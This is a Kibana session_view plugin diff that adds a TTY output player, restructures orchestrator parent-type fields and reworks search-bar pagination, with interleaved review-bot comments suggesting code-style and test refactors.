expect(result.namespace).toEqual(MOCK_ORCHESTRATOR_DATA?.namespace); expect(result.cluster.name).toEqual(MOCK_ORCHESTRATOR_DATA?.cluster?.name); expect(result.cluster.id).toEqual(MOCK_ORCHESTRATOR_DATA?.cluster?.id); - expect(result.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.parent?.type); + expect(result.resource.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.resource?.parent?.type); }); it('getCloudData returns dashes for missing fields', () => { diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts index 7254f57cc93c6..f4da70e5927bc 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts +++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts 
@@ -94,15 +94,15 @@ export const getOrchestratorData = ( name: DASH, type: DASH, ip: DASH, + parent: { + type: DASH, + }, }, namespace: DASH, cluster: { name: DASH, id: DASH, }, - parent: { - type: DASH, - }, }; if (!orchestrator) { @@ -115,7 +115,9 @@ export const getOrchestratorData = ( detailPanelOrchestrator.namespace = dataOrDash(orchestrator?.namespace).toString(); detailPanelOrchestrator.cluster.name = dataOrDash(orchestrator?.cluster?.name).toString(); detailPanelOrchestrator.cluster.id = dataOrDash(orchestrator?.cluster?.id).toString(); - detailPanelOrchestrator.parent.type = dataOrDash(orchestrator?.parent?.type).toString(); + detailPanelOrchestrator.resource.parent.type = dataOrDash( + orchestrator?.resource?.parent?.type + ).toString(); return detailPanelOrchestrator; }; diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx index 6fce4f3f33a13..ba530805c80dc 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx +++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx @@ -41,9 +41,9 @@ const TEST_ORCHESTRATOR_RESOURCE_NAME = 'pdcsi-node-6hvsp'; const TEST_ORCHESTRATOR_RESOURCE_TYPE = 'pod'; const TEST_ORCHESTRATOR_RESOURCE_IP = 'PLACEHOLDER_FOR_RESOURCE.IP'; const TEST_ORCHESTRATOR_NAMESPACE = 'kube-system'; -const TEST_ORCHESTRATOR_PARENT_TYPE = 'elastic-k8s-cluster'; +const TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE = 'elastic-k8s-cluster'; const TEST_ORCHESTRATOR_CLUSTER_ID = 'PLACEHOLDER_FOR_CLUSTER.ID'; -const TEST_ORCHESTRATOR_CLUSTER_NAME = 'PLACEHOLDER_FOR_PARENT.TYPE'; +const TEST_ORCHESTRATOR_CLUSTER_NAME = 'PLACEHOLDER_FOR_CLUSTER.NAME'; // Cloud data const TEST_CLOUD_INSTANCE_NAME = 'gke-cluster-1-paulo-default-pool-f0fea4ab-lhx2'; 
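Review bot: In the index.test.tsx `@@ -41,9 +41,9 @@` hunk, `TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE` keeps the value `'elastic-k8s-cluster'`, which reads as a cluster name rather than a parent type; the rename corrected `TEST_ORCHESTRATOR_CLUSTER_NAME` but left this half of the earlier swap in place. Because the later assertions look the rendered cells up by value, a distinctive placeholder such as `const TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE = 'PLACEHOLDER_FOR_RESOURCE.PARENT.TYPE';` (the value helpers.test.ts already uses) keeps the parent-type and cluster-name checks from ever matching each other's output. The helpers.ts hunks on this line look consistent with the type move; `getOrchestratorData` itself starts outside the first of them.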
@@ -86,15 +86,15 @@ const TEST_ORCHESTRATOR: ProcessEventOrchestrator = { name: TEST_ORCHESTRATOR_RESOURCE_NAME, type: TEST_ORCHESTRATOR_RESOURCE_TYPE, ip: TEST_ORCHESTRATOR_RESOURCE_IP, + parent: { + type: TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE, + }, }, namespace: TEST_ORCHESTRATOR_NAMESPACE, cluster: { name: TEST_ORCHESTRATOR_CLUSTER_NAME, id: TEST_ORCHESTRATOR_CLUSTER_ID, }, - parent: { - type: TEST_ORCHESTRATOR_PARENT_TYPE, - }, }; const TEST_CLOUD: ProcessEventCloud = { @@ -215,14 +215,14 @@ describe('DetailPanelMetadataTab component', () => { expect(renderResult.queryByText('resource.type')).toBeVisible(); expect(renderResult.queryByText('resource.ip')).toBeVisible(); expect(renderResult.queryByText('namespace')).toBeVisible(); - expect(renderResult.queryByText('parent.type')).toBeVisible(); + expect(renderResult.queryByText('resource.parent.type')).toBeVisible(); expect(renderResult.queryByText('cluster.id')).toBeVisible(); expect(renderResult.queryByText('cluster.name')).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_NAME)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_TYPE)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_IP)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_NAMESPACE)).toBeVisible(); - expect(renderResult.queryByText(TEST_ORCHESTRATOR_PARENT_TYPE)).toBeVisible(); + expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_CLUSTER_ID)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_CLUSTER_NAME)).toBeVisible(); diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx index 77a2324bddfc5..797f6c725dfb6 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx 
+++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx @@ -433,6 +433,19 @@ export const DetailPanelMetadataTab = ({ ), }, + { + title: resource.parent.type, + description: ( + + + {orchestratorData.resource.parent.type} + + + ), + }, { title: namespace, description: ( @@ -472,19 +485,6 @@ export const DetailPanelMetadataTab = ({ ), }, - { - title: parent.type, - description: ( - - - {orchestratorData.parent.type} - - - ), - }, ]} /> diff --git a/x-pack/plugins/session_view/public/components/process_tree/hooks.ts b/x-pack/plugins/session_view/public/components/process_tree/hooks.ts index 3b33db65f8274..5369e6a3f2827 100644 --- a/x-pack/plugins/session_view/public/components/process_tree/hooks.ts +++ b/x-pack/plugins/session_view/public/components/process_tree/hooks.ts @@ -140,7 +140,7 @@ export class ProcessImpl implements Process { } hasOutput() { - return !!this.findEventByAction(this.events, EventAction.output); + return !!this.findEventByAction(this.events, EventAction.text_output); } hasAlerts() { diff --git a/x-pack/plugins/session_view/public/components/session_view/hooks.ts b/x-pack/plugins/session_view/public/components/session_view/hooks.ts index f695fb0d3a871..2d24305cc02d7 100644 --- a/x-pack/plugins/session_view/public/components/session_view/hooks.ts +++ b/x-pack/plugins/session_view/public/components/session_view/hooks.ts @@ -20,8 +20,10 @@ import { PROCESS_EVENTS_PER_PAGE, ALERTS_PER_PAGE, ALERT_STATUS_ROUTE, + GET_TOTAL_IO_BYTES_ROUTE, QUERY_KEY_PROCESS_EVENTS, QUERY_KEY_ALERTS, + QUERY_KEY_GET_TOTAL_IO_BYTES, } from '../../../common/constants'; export const useFetchSessionViewProcessEvents = ( 
@@ -187,6 +189,30 @@ export const useFetchAlertStatus = ( return query; }; +// TODO: we should not load by session id, but instead a combo of process.tty.major+minor, session time range, and host.boot_id (see Rabbitholes section of epic). +export const useFetchGetTotalIOBytes = (sessionEntityId: string) => { + const { http } = useKibana().services; + const cachingKeys = [QUERY_KEY_GET_TOTAL_IO_BYTES, sessionEntityId]; + const query = useQuery( + cachingKeys, + async () => { + return http.get(GET_TOTAL_IO_BYTES_ROUTE, { + query: { + sessionEntityId, + }, + }); + }, + { + refetchOnWindowFocus: false, + refetchOnMount: false, + refetchOnReconnect: false, + cacheTime: 0, + } + ); + + return query; +}; + export const useSearchQuery = () => { const [searchQuery, setSearchQuery] = useState(''); const onSearch = ({ query }: EuiSearchBarOnChangeArgs) => { diff --git a/x-pack/plugins/session_view/public/components/session_view/index.test.tsx b/x-pack/plugins/session_view/public/components/session_view/index.test.tsx index 159a3782be259..26b5d9c3cc7f9 100644 --- a/x-pack/plugins/session_view/public/components/session_view/index.test.tsx +++ b/x-pack/plugins/session_view/public/components/session_view/index.test.tsx @@ -12,6 +12,7 @@ import { AppContextTestRender, createAppRootMockRenderer } from '../../test'; import { SessionView } from '.'; import userEvent from '@testing-library/user-event'; import { useDateFormat } from '../../hooks'; +import { GET_TOTAL_IO_BYTES_ROUTE, PROCESS_EVENTS_ROUTE } from '../../../common/constants'; jest.mock('../../hooks/use_date_format'); const mockUseDateFormat = useDateFormat as jest.Mock; 
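Review bot: `cachingKeys` in `useFetchGetTotalIOBytes` is rebuilt on every render, while the sibling hook `useFetchIOEvents` added in `tty_player/hooks.ts` by this same commit wraps the same shape of key in `useMemo`; react-query hashes keys so both work, but the two new hooks should follow one convention, e.g. `const cachingKeys = useMemo(() => [QUERY_KEY_GET_TOTAL_IO_BYTES, sessionEntityId], [sessionEntityId]);` if `useMemo` is imported in this file (its import block is outside the hunk). The value returned here is consumed as a byte count by `SessionView` (`!!totalTTYOutputBytes`); unless a generic was lost in rendering, pin it with `http.get<number>(GET_TOTAL_IO_BYTES_ROUTE, …)` so a changed route payload fails type-checking instead of silently hiding the TTY button. The TODO above the hook is useful; a second line naming what `cacheTime: 0` is for (a stale byte count would hide the button for a session that has since produced output) would make the option choice self-explaining.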
@@ -135,5 +136,45 @@ describe('SessionView component', () => { expect(renderResult.getAllByTestId('sessionView:sessionViewRefreshButton')).toBeTruthy(); }); }); + + describe('TTYPlayer button', () => { + it('should show tty player button, if session has output', async () => { + mockedApi.mockImplementation(async (path: any) => { + if (path === PROCESS_EVENTS_ROUTE) { + return sessionViewProcessEventsMock; + } else if (path === GET_TOTAL_IO_BYTES_ROUTE) { + return 1024; + } + + return 0; + }); + + render(); + await waitForApiCall(); + + expect(renderResult.queryByTestId('sessionView:TTYPlayerToggle')).toBeTruthy(); + }); + + it('should NOT show tty player button, if session has no output', async () => { + mockedApi.mockImplementation(async (options) => { + // for some reason the typescript interface for options says its an object with a field called path. + // in reality options is a string (which equals the path...) + const path = String(options); + + if (path === PROCESS_EVENTS_ROUTE) { + return sessionViewProcessEventsMock; + } else if (path === GET_TOTAL_IO_BYTES_ROUTE) { + return 0; + } + + return 0; + }); + + render(); + await waitForApiCall(); + + expect(renderResult.queryByTestId('sessionView:TTYPlayerToggle')).toBeFalsy(); + }); + }); }); }); diff --git a/x-pack/plugins/session_view/public/components/session_view/index.tsx b/x-pack/plugins/session_view/public/components/session_view/index.tsx index 1c099e056df88..e2d795283c7ce 100644 --- a/x-pack/plugins/session_view/public/components/session_view/index.tsx +++ b/x-pack/plugins/session_view/public/components/session_view/index.tsx @@ -16,7 +16,6 @@ import { EuiBetaBadge, EuiButtonIcon, } from '@elastic/eui'; -import { i18n } from '@kbn/i18n'; import { FormattedMessage } from '@kbn/i18n-react'; import useLocalStorage from 'react-use/lib/useLocalStorage'; import { SectionLoading } from '../../shared_imports'; 
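Review bot: The two new mocks in the 'TTYPlayer button' block handle their first argument differently — the first declares it `path: any`, the second coerces with `String(options)` and carries the comment explaining the typing mismatch — so the same workaround is written twice and only one copy documents it. Hoist it into one helper, e.g. `const mockRoutes = (totalBytes: number) => async (options: unknown) => { const path = String(options); … }`, and call `mockedApi.mockImplementation(mockRoutes(1024))` and `mockRoutes(0)` in the two tests; that also removes the `any`. The fallback `return 0` for every other route is shared by both tests and belongs in that helper as well.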
@@ -31,17 +30,16 @@ import { SessionViewDeps } from '../../types'; import { SessionViewDetailPanel } from '../session_view_detail_panel'; import { SessionViewSearchBar } from '../session_view_search_bar'; import { SessionViewDisplayOptions } from '../session_view_display_options'; +import { TTYPlayer } from '../tty_player'; import { useStyles } from './styles'; import { useFetchAlertStatus, useFetchSessionViewProcessEvents, useFetchSessionViewAlerts, + useFetchGetTotalIOBytes, } from './hooks'; import { LOCAL_STORAGE_DISPLAY_OPTIONS_KEY } from '../../../common/constants'; - -const BETA = i18n.translate('xpack.sessionView.beta', { - defaultMessage: 'Beta', -}); +import { BETA, REFRESH_SESSION, OPEN_TTY_PLAYER } from './translations'; /** * The main wrapper component for the session view. @@ -61,6 +59,7 @@ export const SessionView = ({ jumpToCursor = undefined; } + const [showTTY, setShowTTY] = useState(false); const [isDetailOpen, setIsDetailOpen] = useState(false); const [selectedProcess, setSelectedProcess] = useState(null); const [searchQuery, setSearchQuery] = useState(''); @@ -86,6 +85,10 @@ export const SessionView = ({ return !!(!displayOptions?.verboseMode && searchQuery && searchResults?.length === 0); }, [displayOptions?.verboseMode, searchResults, searchQuery]); + const onToggleTTY = useCallback(() => { + setShowTTY(!showTTY); + }, [showTTY]); + const onProcessSelected = useCallback((process: Process | null) => { setSelectedProcess(process); }, []); @@ -159,6 +162,9 @@ export const SessionView = ({ fetchAlertStatus[0] ?? '' ); + const { data: totalTTYOutputBytes } = useFetchGetTotalIOBytes(sessionEntityId); + const hasTTYOutput = !!totalTTYOutputBytes; + useEffect(() => { if (newUpdatedAlertsStatus) { setUpdatedAlertsStatus({ ...newUpdatedAlertsStatus }); 
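Review bot: `onToggleTTY` closes over `showTTY` and lists it as a dependency, so the callback is recreated on every toggle and anything memoised on it re-renders; the functional updater form needs no dependency at all: `const onToggleTTY = useCallback(() => setShowTTY((prev) => !prev), []);`. The `onProcessSelected` callback directly below it already uses the stable empty-dependency pattern, so this keeps the file consistent.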
@@ -167,6 +173,19 @@ export const SessionView = ({ } }, [newUpdatedAlertsStatus, fetchAlertStatus]); + const onSearchIndexChange = useCallback( + (index: number) => { + if (searchResults) { + const process = searchResults[index]; + + if (process) { + onProcessSelected(process); + } + } + }, + [onProcessSelected, searchResults] + ); + const handleOnAlertDetailsClosed = useCallback((alertUuid: string) => { setFetchAlertStatus([alertUuid]); }, []); @@ -228,142 +247,162 @@ export const SessionView = ({ } return ( - <> -
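Review bot: In `onSearchIndexChange` the outer `if (searchResults)` guard exists only to index into the array and can be folded into the lookup, leaving a single early exit: `const process = searchResults?.[index]; if (process) { onProcessSelected(process); }`. A one-line comment saying that `index` is the zero-based position handed over by `SessionViewSearchBar`'s `onNext`/`onPrevious` would also help, since this commit changes that prop interface from passing a `Process` to passing an index.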
- - - - - - - - +
+ + + + + + + + + + + + + {hasTTYOutput && ( + )} - - + + + + + + - + + + + + + + {(EuiResizablePanel, EuiResizableButton, { togglePanel }) => { + detailPanelCollapseFn.current = () => { + togglePanel?.('session-detail-panel', { direction: 'left' }); + }; - - + + {hasError && ( + + + + } + body={ +

+ +

+ } + /> + )} + + {hasData && ( +
+ +
+ )} +
+ + + - -
-
- - - - - {(EuiResizablePanel, EuiResizableButton, { togglePanel }) => { - detailPanelCollapseFn.current = () => { - togglePanel?.('session-detail-panel', { direction: 'left' }); - }; - - return ( - <> - - {hasError && ( - - - - } - body={ -

- -

- } - /> - )} - - {hasData && ( -
- -
- )} -
- - - - - - - ); - }} -
-
- + + + ); + }} + + {showTTY && ( + + )} +
); }; // eslint-disable-next-line import/no-default-export diff --git a/x-pack/plugins/session_view/public/components/session_view/styles.ts b/x-pack/plugins/session_view/public/components/session_view/styles.ts index 0b05f3b9d9c9b..c532ef1371b40 100644 --- a/x-pack/plugins/session_view/public/components/session_view/styles.ts +++ b/x-pack/plugins/session_view/public/components/session_view/styles.ts @@ -46,6 +46,7 @@ export const useStyles = ({ height = 500, isFullScreen }: StylesDeps) => { }; const sessionViewerComponent: CSSObject = { + position: 'relative', border: border.thin, borderRadius: border.radius.medium, '.sessionViewerToolbar': { diff --git a/x-pack/plugins/session_view/public/components/session_view/translations.ts b/x-pack/plugins/session_view/public/components/session_view/translations.ts new file mode 100644 index 0000000000000..244a5a355b0ec --- /dev/null +++ b/x-pack/plugins/session_view/public/components/session_view/translations.ts @@ -0,0 +1,19 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { i18n } from '@kbn/i18n'; + +export const BETA = i18n.translate('xpack.sessionView.beta', { + defaultMessage: 'Beta', +}); + +export const REFRESH_SESSION = i18n.translate('xpack.sessionView.refreshSession', { + defaultMessage: 'Refresh session', +}); + +export const OPEN_TTY_PLAYER = i18n.translate('xpack.sessionView.openTTYPlayer', { + defaultMessage: 'Open TTY player', +}); diff --git a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx index dd758529530ba..8b3498f2a11b8 100644 --- a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx 
+++ b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx @@ -16,23 +16,28 @@ describe('SessionViewSearchBar component', () => { let render: () => ReturnType; let renderResult: ReturnType; let mockedContext: AppContextTestRender; + let props = { + searchQuery: 'ls', + totalMatches: 0, + onNext: jest.fn((query) => query), + onPrevious: jest.fn((query) => query), + setSearchQuery: jest.fn((query) => query), + }; beforeEach(() => { mockedContext = createAppRootMockRenderer(); + + props = { + searchQuery: 'ls', + totalMatches: 0, + onNext: jest.fn((query) => query), + onPrevious: jest.fn((query) => query), + setSearchQuery: jest.fn((query) => query), + }; }); it('handles a typed search query', async () => { - const mockSetSearchQuery = jest.fn((query) => query); - const mockOnProcessSelected = jest.fn((process) => process); - - renderResult = mockedContext.render( - - ); + renderResult = mockedContext.render(); const searchInput = renderResult.getByTestId('sessionView:searchBar').querySelector('input'); @@ -44,24 +49,17 @@ describe('SessionViewSearchBar component', () => { } expect(searchInput?.value).toEqual('ls -la'); - expect(mockSetSearchQuery.mock.calls.length).toBe(1); - expect(mockSetSearchQuery.mock.results[0].value).toBe('ls -la'); + expect(props.setSearchQuery.mock.calls.length).toBe(1); + expect(props.setSearchQuery.mock.results[0].value).toBe('ls -la'); }); it('shows a results navigator when searchResults provided', async () => { const processMock2 = { ...processMock }; const processMock3 = { ...processMock }; const mockResults = [processMock, processMock2, processMock3]; - const mockSetSearchQuery = jest.fn((query) => query); - const mockOnProcessSelected = jest.fn((process) => process); renderResult = mockedContext.render( - + ); const searchPagination = renderResult.getByTestId('sessionView:searchPagination'); 
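Review bot: `props` is initialised with a full object literal at its declaration and then rebuilt with an identical literal in `beforeEach`, so the fixture is written twice and the two copies can drift. Declare it once through a factory — `const makeProps = () => ({ searchQuery: 'ls', totalMatches: 0, onNext: jest.fn((index) => index), onPrevious: jest.fn((index) => index), setSearchQuery: jest.fn((query) => query) });` — then `let props: ReturnType<typeof makeProps>;` and `props = makeProps();` inside `beforeEach`. The `onNext`/`onPrevious` mocks currently name their parameter `query` although, per the new `SessionViewSearchBarDeps`, they receive a numeric index.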
@@ -73,6 +71,16 @@ describe('SessionViewSearchBar component', () => { userEvent.click(renderResult.getByTestId('pagination-button-next')); expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('2 of 3'); + userEvent.click(renderResult.getByTestId('pagination-button-next')); + expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('3 of 3'); + + // ensure clicking next after we reach the end doesn't cause a 4 of 3 situation. + userEvent.click(renderResult.getByTestId('pagination-button-next')); + expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('3 of 3'); + + userEvent.click(renderResult.getByTestId('pagination-button-previous')); + expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('2 of 3'); + const searchInput = renderResult.getByTestId('sessionView:searchBar').querySelector('input'); if (searchInput) { @@ -83,13 +91,8 @@ describe('SessionViewSearchBar component', () => { // after search is changed, results index should reset to 1 expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('1 of 3'); - // setSelectedProcess should be called 3 times: - // 1. searchResults is set so auto select first item - // 2. next button hit, so call with 2nd item - // 3. search changed, so call with first result. - expect(mockOnProcessSelected.mock.calls.length).toBe(3); - expect(mockOnProcessSelected.mock.results[0].value).toEqual(processMock); - expect(mockOnProcessSelected.mock.results[1].value).toEqual(processMock2); - expect(mockOnProcessSelected.mock.results[1].value).toEqual(processMock); + expect(props.onNext.mock.calls.length).toBe(2); + expect(props.onPrevious.mock.calls.length).toBe(1); + expect(props.onPrevious.mock.results[0].value).toEqual(1); // e.g 2 of 3, 1 because index is zero based. }); }); 
diff --git a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx index 0cac43f39a8ec..3fa7bcaf5d829 100644 --- a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx +++ b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx @@ -4,18 +4,18 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import React, { useState, useEffect } from 'react'; +import React, { useState, useCallback } from 'react'; import { EuiSearchBar, EuiPagination } from '@elastic/eui'; import { EuiSearchBarOnChangeArgs } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; -import { Process } from '../../../common/types/process_tree'; import { useStyles } from './styles'; interface SessionViewSearchBarDeps { searchQuery: string; setSearchQuery(val: string): void; - searchResults: Process[] | null; - onProcessSelected(process: Process): void; + totalMatches: number; + onPrevious: (index: number) => void; + onNext: (index: number) => void; } const translatePlaceholder = { @@ -34,11 +34,12 @@ const NO_RESULTS = i18n.translate('xpack.sessionView.searchBar.searchBarNoResult export const SessionViewSearchBar = ({ searchQuery, setSearchQuery, - onProcessSelected, - searchResults, + totalMatches, + onPrevious, + onNext, }: SessionViewSearchBarDeps) => { - const showPagination = !!searchQuery && searchResults?.length !== 0; - const noResults = !!searchQuery && searchResults?.length === 0; + const showPagination = !!searchQuery && totalMatches !== 0; + const noResults = !!searchQuery && totalMatches === 0; const styles = useStyles({ hasSearchResults: showPagination }); 
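Review bot: The updated `SessionViewSearchBarDeps` mixes declaration styles — `setSearchQuery(val: string): void;` is a method signature while the new `onPrevious`/`onNext` are function-typed properties — so the interface should settle on one, preferably the property form, whose parameters are checked contravariantly under `strictFunctionTypes`: `setSearchQuery: (val: string) => void;`. `totalMatches` replaces the former `searchResults` array; a short TSDoc line on it noting that it is the count the pagination is sized from would help, since the component no longer sees the results themselves.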
@@ -54,15 +55,18 @@ export const SessionViewSearchBar = ({ } }; - useEffect(() => { - if (searchResults) { - const process = searchResults[selectedResult]; + const onPageClick = useCallback( + (page: number) => { + setSelectedResult(page); - if (process) { - onProcessSelected(process); + if (page > selectedResult) { + onNext(page); + } else { + onPrevious(page); } - } - }, [searchResults, onProcessSelected, selectedResult]); + }, + [onNext, onPrevious, selectedResult] + ); return (
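Review bot: `onPageClick` treats every non-increasing page as a move backwards: if `EuiPagination` ever reports the page that is already selected (`page === selectedResult`), `onPrevious(page)` fires and the parent re-selects the same result, which the new `3 of 3` test only passes because the control happens not to emit that click. Make the no-op explicit with `if (page === selectedResult) { return; }` as the first statement of the callback, and use `else if (page < selectedResult)` for the previous branch so the intent reads from the code. The declaration of `selectedResult` and the reset-on-query-change logic are outside this hunk.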
@@ -72,9 +76,9 @@ export const SessionViewSearchBar = ({ )} diff --git a/x-pack/plugins/session_view/public/components/tty_player/hooks.test.tsx b/x-pack/plugins/session_view/public/components/tty_player/hooks.test.tsx new file mode 100644 index 0000000000000..23f81d7941439 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/hooks.test.tsx 
@@ -0,0 +1,174 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { renderHook, act } from '@testing-library/react-hooks'; +import { sessionViewIOEventsMock } from '../../../common/mocks/responses/session_view_io_events.mock'; +import { useIOLines, useXtermPlayer, XtermPlayerDeps } from './hooks'; +import { ProcessEventsPage } from '../../../common/types/process_tree'; +import { DEFAULT_TTY_PLAYSPEED_MS } from '../../../common/constants'; + +describe('TTYPlayer/hooks', () => { + beforeAll(() => { + // https://stackoverflow.com/questions/39830580/jest-test-fails-typeerror-window-matchmedia-is-not-a-function + // xtermjs is using window.matchMedia, which isn't mocked in jest by default. + Object.defineProperty(window, 'matchMedia', { + writable: true, + value: jest.fn().mockImplementation((query) => ({ + matches: false, + media: query, + onchange: null, + addListener: jest.fn(), // Deprecated + removeListener: jest.fn(), // Deprecated + addEventListener: jest.fn(), + removeEventListener: jest.fn(), + dispatchEvent: jest.fn(), + })), + }); + + jest.useFakeTimers(); + }); + + describe('useIOLines', () => { + it('returns an array of "best effort" lines of tty output', async () => { + const events = sessionViewIOEventsMock?.events?.map((event) => event._source); + const initial: ProcessEventsPage[] = [{ events, total: events?.length }]; + + const { result, rerender } = renderHook(({ pages }) => useIOLines(pages), { + initialProps: { pages: initial }, + }); + + expect(result.current.length).toBeGreaterThan(0); + expect(typeof result.current[0].value).toBe('string'); + + // test memoization + let last = result.current; + rerender(); + expect(result.current === last).toBeTruthy(); + last = result.current; + rerender({ pages: [...initial] }); + 
expect(result.current === last).toBeFalsy(); + }); + }); + + describe('useXtermPlayer', () => { + let initialProps: XtermPlayerDeps; + + beforeEach(() => { + const events = sessionViewIOEventsMock?.events?.map((event) => event._source); + const pages: ProcessEventsPage[] = [{ events, total: events?.length }]; + const { result } = renderHook(() => useIOLines(pages)); + const lines = result.current; + const div = document.createElement('div'); + const mockRef = { current: div }; + initialProps = { + ref: mockRef, + isPlaying: false, + lines, + hasNextPage: false, + fetchNextPage: () => null, + isFullscreen: false, + }; + }); + + it('mounts and renders the first line of output', async () => { + const { result: xTermResult } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + const { terminal, currentLine, seekToLine } = xTermResult.current; + + // there is a minor delay in updates to xtermjs after writeln is called. + jest.advanceTimersByTime(100); + + // check that first line rendered in xtermjs + expect(terminal.buffer.active.getLine(0)?.translateToString(true)).toBe('256'); + expect(currentLine).toBe(0); + + act(() => { + seekToLine(17); // line where vim output starts + }); + + jest.advanceTimersByTime(100); + + expect(terminal.buffer.active.getLine(0)?.translateToString(true)).toBe('#!/bin/env bash'); + }); + + it('allows the user to seek to any line of output', async () => { + const { result: xTermResult } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + act(() => { + xTermResult.current.seekToLine(17); // line where vim output starts + }); + + jest.advanceTimersByTime(100); + + const { terminal, currentLine } = xTermResult.current; + + expect(currentLine).toBe(17); + expect(terminal.buffer.active.getLine(0)?.translateToString(true)).toBe('#!/bin/env bash'); + }); + + it('allows the user to play', async () => { + const { result, rerender } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + 
rerender({ ...initialProps, isPlaying: true }); + + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * 10); + }); + + expect(result.current.currentLine).toBe(10); + }); + + it('allows the user to stop', async () => { + const { result, rerender } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + rerender({ ...initialProps, isPlaying: true }); + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * 10); + }); + rerender({ ...initialProps, isPlaying: false }); + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * 10); + }); + expect(result.current.currentLine).toBe(10); // should still be ten. + }); + + it('should stop when it reaches the end of the array of lines', async () => { + const { result, rerender } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + rerender({ ...initialProps, isPlaying: true }); + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * initialProps.lines.length + 100); + }); + expect(result.current.currentLine).toBe(initialProps.lines.length); + }); + + it('will allow a plain text search highlight on the last line printed', async () => { + const { result: xTermResult } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + jest.advanceTimersByTime(100); + + act(() => { + xTermResult.current.search('256', 0); + }); + + const { terminal } = xTermResult.current; + + expect(terminal.getSelection()).toBe('256'); + }); + }); +}); diff --git a/x-pack/plugins/session_view/public/components/tty_player/hooks.ts b/x-pack/plugins/session_view/public/components/tty_player/hooks.ts new file mode 100644 index 0000000000000..a37f8899d0ed4 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/hooks.ts 
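Review bot: The `window.matchMedia` stub in `beforeAll` is copied verbatim into `tty_player/index.test.tsx` in this same commit; move it into the shared test utilities under `../../test` (for example a `mockMatchMedia()` helper) so both suites call one line and the stub is maintained in one place. `jest.useFakeTimers()` in the same `beforeAll` is never undone; add `afterAll(() => jest.useRealTimers());` so timer behaviour does not leak if these describes are later merged with others. In the `useIOLines` test, `events` may be `undefined` under the optional chain and `total: events?.length` silently mirrors that; asserting the mock is non-empty first would give a clearer failure than the later `toBeGreaterThan(0)`.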
